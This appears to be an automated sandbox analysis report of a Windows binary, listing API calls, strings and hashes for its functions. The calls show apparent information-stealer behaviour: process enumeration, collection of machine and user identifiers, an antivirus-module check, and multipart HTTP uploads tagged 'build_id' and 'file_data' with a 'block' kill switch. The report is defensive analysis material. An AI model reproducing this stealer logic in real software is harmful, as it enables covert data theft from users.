Instruction Fuzzy Hash: 92116A70D0434ADFCB01AFA4D888AAEBFB9EF49710F544068F101E7251CB30994ACB70

Function 00D63101 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00D87817,?,?), ref: 00D63130
Process32First.KERNEL32(00000000,00000128), ref: 00D63140
Process32Next.KERNEL32(00000000,00000128), ref: 00D6319E
CloseHandle.KERNEL32(00000000), ref: 00D631A9

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 17ebd8161ccb4e380846447587467e4f83095cd13f514687c2105824e9628b42
Instruction ID: 5d2aba78968ebf16123398c342ee98a99f13bada7d57ebc82b5ffaa24e2efd2f
Opcode Fuzzy Hash: 17ebd8161ccb4e380846447587467e4f83095cd13f514687c2105824e9628b42
Instruction Fuzzy Hash: 9D117071A00318ABD711BB64DC86BFE73A8EB09700F040096B905A7252DB749F48DF70

Function 00D6298A Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00D629A5
HeapAlloc.KERNEL32(00000000), ref: 00D629AC
GetTimeZoneInformation.KERNEL32(?), ref: 00D629BB
wsprintfA.USER32 ref: 00D629D9

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 298ce8b98b75e8c871ea1e37af5fdff49c4f14fcc6c370c588f771555f18b5a8
Instruction ID: bad61ad53d7ad4739ccd4d80b86f8abf86274ba8ad37fcbe5ab733184d52eb84
Opcode Fuzzy Hash: 298ce8b98b75e8c871ea1e37af5fdff49c4f14fcc6c370c588f771555f18b5a8
Instruction Fuzzy Hash: B4F0B470A01228BBE700AB74AC09B6A3768FF44320F140256F515D72D0DB709E548BA1

Function 00D628E1 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D51375), ref: 00D628ED
HeapAlloc.KERNEL32(00000000,?,?,?,00D51375), ref: 00D628F4
GetComputerNameA.KERNEL32(00000000,00D51375), ref: 00D62908

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 41b3e8e92d501534e538e7ec1d2847db9f39273e05da1ed451c43972d990331f
Instruction ID: 6cfcd1f698edee8a0fc11ccffe8a71870aec73f83eddbb927aba43285bb6879a
Opcode Fuzzy Hash: 41b3e8e92d501534e538e7ec1d2847db9f39273e05da1ed451c43972d990331f
Instruction Fuzzy Hash: EAE0ECB9310344ABE7009B9A9C0EB9A76ACEB84B55F144066F606D3250E6B0DA899730

Function 00D628AF Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D513A9), ref: 00D628BB
HeapAlloc.KERNEL32(00000000,?,?,?,00D513A9), ref: 00D628C2
GetUserNameA.ADVAPI32(00000000,00D513A9), ref: 00D628D6

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: d54353521ecbc478924bd6c311149ffef1b40f682deaf920eff8729af8178128
Instruction ID: b2dd8a683febb10dbbbdf934a2b8bfc732e98968b58fe7aa2b87cf1a42f375a3
Opcode Fuzzy Hash: d54353521ecbc478924bd6c311149ffef1b40f682deaf920eff8729af8178128
Instruction Fuzzy Hash: 93D05BB9610344BBD7005795DC0DECE77BCD784715F000056F605D2350D5F0998D9730

Function 00D62C16 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00D62C30
wsprintfA.USER32 ref: 00D62C48

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 257dc45a37b71d30493d3b2f0a7ea7955587d5d9f243eeb07f595ba290a1c874
Instruction ID: 225db2e0caea760c6a593496f0ac184ccdc7ca58795557fda0119fb5a325b355
Opcode Fuzzy Hash: 257dc45a37b71d30493d3b2f0a7ea7955587d5d9f243eeb07f595ba290a1c874
Instruction Fuzzy Hash: 85E0ED7091021DABCB11DF60ED55ADE77FCAB08304F4045A6A505D3190D670AB889F95

Function 00D5149D Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00D514F3,avghookx.dll,00D69D23), ref: 00D514CF

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: e6eba43f93e3787dd897de8f82c7b5d2033d51d6ebb88163e0d7455479dae993
Instruction ID: 0513e0869a841126aa70a5b078f1bca96f19d9a45e522711e9e4ce89c73c1e49
Opcode Fuzzy Hash: e6eba43f93e3787dd897de8f82c7b5d2033d51d6ebb88163e0d7455479dae993
Instruction Fuzzy Hash: 43F0823A900150EBCF20CF55D804BAAF7B8EB43761F257054DC09B7200C330ED09DAA8

Function 00D553AA Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A10
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A16
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A1C
Part of subcall function 00D549DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00D54A2E
Part of subcall function 00D549DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00D54A36

lstrlenA.KERNEL32(?), ref: 00D55441

Part of subcall function 00D63AB9: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,00D5543A,?,?,?,?), ref: 00D63AD9
Part of subcall function 00D63AB9: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00D63AE6
Part of subcall function 00D63AB9: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00D63AED

StrCmpCA.SHLWAPI(?,00D87A3B,00D87A3A,00D87A37,00D87A2F), ref: 00D554B0
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D554D2
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D555E8
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00D5562C
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D5565E

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

lstrlenA.KERNEL32(?,",file_data,00D88A18,------,00D88A0C,?,",00D88A00,------,00D889F4,fc02efe1cfb2a62f36f33fff0274fb41,",build_id,00D889DC,------), ref: 00D55B8F
lstrlenA.KERNEL32(?), ref: 00D55BA2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D55BBA
HeapAlloc.KERNEL32(00000000), ref: 00D55BC1
lstrlenA.KERNEL32(?), ref: 00D55BCE
_memmove.LIBCMT ref: 00D55BDC
lstrlenA.KERNEL32(?,?,?), ref: 00D55BF1
_memmove.LIBCMT ref: 00D55BFE
lstrlenA.KERNEL32(?), ref: 00D55C0C
lstrlenA.KERNEL32(?,?,00000000), ref: 00D55C1A
_memmove.LIBCMT ref: 00D55C2D
lstrlenA.KERNEL32(?,?,00000000), ref: 00D55C42
HttpSendRequestA.WININET(?,?,00000000), ref: 00D55C55
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00D55C97
InternetReadFile.WININET(?,?,000007CF,?), ref: 00D55D4E
StrCmpCA.SHLWAPI(?,block), ref: 00D55D63
ExitProcess.KERNEL32 ref: 00D55D6E

Strings

fc02efe1cfb2a62f36f33fff0274fb41, xrefs: 00D558CF
------, xrefs: 00D5552D
------, xrefs: 00D55A85
", xrefs: 00D55743
ERROR, xrefs: 00D55E57
", xrefs: 00D558A3
ERROR, xrefs: 00D55CA1
", xrefs: 00D55A00
------, xrefs: 00D557C5
file_data, xrefs: 00D55B31
build_id, xrefs: 00D55877
--, xrefs: 00D55528
", xrefs: 00D55B5D
------, xrefs: 00D55664
------, xrefs: 00D55927
block, xrefs: 00D55D58

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$fc02efe1cfb2a62f36f33fff0274fb41$file_data
API String ID: 2638065154-3503230820
Opcode ID: a60213d517bffa9eb00c968e20e2a33753412e526330d89eac2946028e365b58
Instruction ID: 4f311273b569b54d1ee08bf66527c6759e9c168a2aba55b7b24b63e7a3041aef
Opcode Fuzzy Hash: a60213d517bffa9eb00c968e20e2a33753412e526330d89eac2946028e365b58
Instruction Fuzzy Hash: A042A63294056D9BDF20FB21DC42AEDB3B8FF05301F4585E1A94873122DA716F9A9FA0

Function 00D55E61 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 469
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A10
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A16
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A1C
Part of subcall function 00D549DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00D54A2E
Part of subcall function 00D549DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00D54A36

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D55F00
StrCmpCA.SHLWAPI(?), ref: 00D55F1E
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D560B6
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00D560FA
lstrlenA.KERNEL32(?,",mode,00D88AA0,------,00D88A94,fc02efe1cfb2a62f36f33fff0274fb41,",build_id,00D88A7C,------,00D88A70,",00D88A64,------), ref: 00D56529
lstrlenA.KERNEL32(?), ref: 00D56538
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D56542
HeapAlloc.KERNEL32(00000000), ref: 00D56549
lstrlenA.KERNEL32(?), ref: 00D56556
_memmove.LIBCMT ref: 00D56564
lstrlenA.KERNEL32(?), ref: 00D56572
lstrlenA.KERNEL32(?,?,00000000), ref: 00D56580
_memmove.LIBCMT ref: 00D5658D
lstrlenA.KERNEL32(?,?,00000000), ref: 00D565A2
HttpSendRequestA.WININET(?,?,00000000), ref: 00D565B5
InternetReadFile.WININET(?,?,000000C7,?), ref: 00D56616
InternetCloseHandle.WININET(?), ref: 00D56626
InternetCloseHandle.WININET(?), ref: 00D56632
InternetCloseHandle.WININET(?), ref: 00D56644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D5612C

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Strings

mode, xrefs: 00D564A1
fc02efe1cfb2a62f36f33fff0274fb41, xrefs: 00D5639D
------, xrefs: 00D563F5
", xrefs: 00D56371
", xrefs: 00D564CD
build_id, xrefs: 00D56345
", xrefs: 00D56211
------, xrefs: 00D56132
------, xrefs: 00D55FA8
------, xrefs: 00D56293

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$build_id$fc02efe1cfb2a62f36f33fff0274fb41$mode
API String ID: 3702379033-2360922086
Opcode ID: 59583bbfefa189ad9bb5c317808fd4aea3a555711d1ec13f27f4fc1473b53be1
Instruction ID: e74fb41ae9ee0838edb98e48c28dfedbc77b825d497965c79b79634c1e9beadd
Opcode Fuzzy Hash: 59583bbfefa189ad9bb5c317808fd4aea3a555711d1ec13f27f4fc1473b53be1
Instruction Fuzzy Hash: E222B43194426D9BCF60EB61DD42BEDB774EF09301F4184E2AA0973162DA316F9A9F70

Function 00D658C3 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D6291C: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,00D8761F,?,?,?), ref: 00D62934
Part of subcall function 00D6291C: HeapAlloc.KERNEL32(00000000), ref: 00D6293B
Part of subcall function 00D6291C: GetLocalTime.KERNEL32(?), ref: 00D62947
Part of subcall function 00D6291C: wsprintfA.USER32 ref: 00D62972

Part of subcall function 00D63230: _memset.LIBCMT ref: 00D63263
Part of subcall function 00D63230: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00D63282
Part of subcall function 00D63230: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00D632A7
Part of subcall function 00D63230: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00D632B3
Part of subcall function 00D63230: CharToOemA.USER32(?,?), ref: 00D632C7

Part of subcall function 00D632E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00D632FB
Part of subcall function 00D632E0: _memset.LIBCMT ref: 00D6332A
Part of subcall function 00D632E0: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00D63352
Part of subcall function 00D632E0: lstrcatA.KERNEL32(?,00D87E68,?,?,?,?,?), ref: 00D6336F

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D625FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00D62631
Part of subcall function 00D625FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D62671
Part of subcall function 00D625FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00D626C6
Part of subcall function 00D625FE: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00D626CD

GetCurrentProcessId.KERNEL32(Path: ,00D878BC,HWID: ,00D878B0,GUID: ,00D878A4,00000000,MachineID: ,00D87894,00000000,Date: ,00D87888,00D87884,11.8,Version: ,00D8761F), ref: 00D65B18

Part of subcall function 00D63EE1: OpenProcess.KERNEL32(00000410,00000000,00D65B27,00000000,?), ref: 00D63F03
Part of subcall function 00D63EE1: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00D63F1E
Part of subcall function 00D63EE1: CloseHandle.KERNEL32(00000000), ref: 00D63F25

